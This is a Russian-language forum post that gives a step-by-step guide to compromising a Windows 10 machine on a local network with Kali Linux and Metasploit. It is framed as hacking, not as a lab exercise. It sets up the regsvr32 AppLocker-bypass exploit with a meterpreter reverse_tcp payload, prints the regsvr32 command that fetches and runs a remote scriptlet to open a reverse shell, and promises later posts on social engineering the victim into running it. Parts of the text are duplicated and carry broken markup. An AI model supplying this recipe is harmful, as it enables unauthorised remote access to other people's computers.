Авторская статья [KALI LINUX] Взлом Windows 10

Доброго времени суток,надеюсь что эта статья получит статус Авторская.

Попытаюсь вам рассказать,как можно взломать WIndows 10 используя KALI LINUX...

Для этого дела нам понадобятся:

• Windows 10 в локальной сети
• Kali Linux(или другой дистрибутив с meterpreter)
• Этот гайд

Так,теперь приступим.


Для начала запустим meterpreter:

msfconsole

Код

msfconsole

Через некоторое время появится вновь возможность вводить команды в терминале.
С недавним обновлением msfconsole туда добавили довольно интересные эксплоит REGSVR32_APPLOCKER_BYPASS_SERVER.

Используем его:

use exploit/windows/misc/regsvr32_applocker_bypass_server

Код

use exploit/windows/misc/regsvr32_applocker_bypass_server

Список функций можно просмотреть,введя команду:

options

Код

options

Мы увидим кучу настроек.Но пока трогать мы их не будем.

Продолжаем вписывать следующие команды:

set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.*.* (тут вы должны написать ваш локальный ip)
set LPORT 4444
exploit[SRC]

Если meterpreter не выдал ошибки мы увидим одну строку,которая нам понадобится:
[SRC]regsvr32 /s /n /v /i:http://ВАШ_ЛОКАЛЬНЫЙ_IP:8080/k0223D2yUFGaEb.sct scrobj.dll

Эту строку вы должны ***** в командной строке windows(Позже напишу,какими способами можно ***** данную строку удаленно,используя СИ или другие утилиты).


После выполнения команды в терминале откроется сессия.
Что бы использовать сессию,мы введем следующие команды:
[SRC]session -l 1

Код

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.*.* (тут вы должны написать ваш локальный ip)

set LPORT 4444

exploit[SRC]



Если meterpreter не выдал ошибки мы увидим одну строку,которая нам понадобится:

[SRC]regsvr32 /s /n /v /i:http://ВАШ_ЛОКАЛЬНЫЙ_IP:8080/k0223D2yUFGaEb.sct scrobj.dll



Эту строку вы должны ***** в командной строке windows(Позже напишу,какими способами можно ***** данную строку удаленно,используя СИ или другие утилиты).





После выполнения команды в терминале откроется сессия.

Что бы использовать сессию,мы введем следующие команды:

[SRC]session -l 1

Так же в следующей статье расскажу о повышении прав в системе. Спасибо за внимание.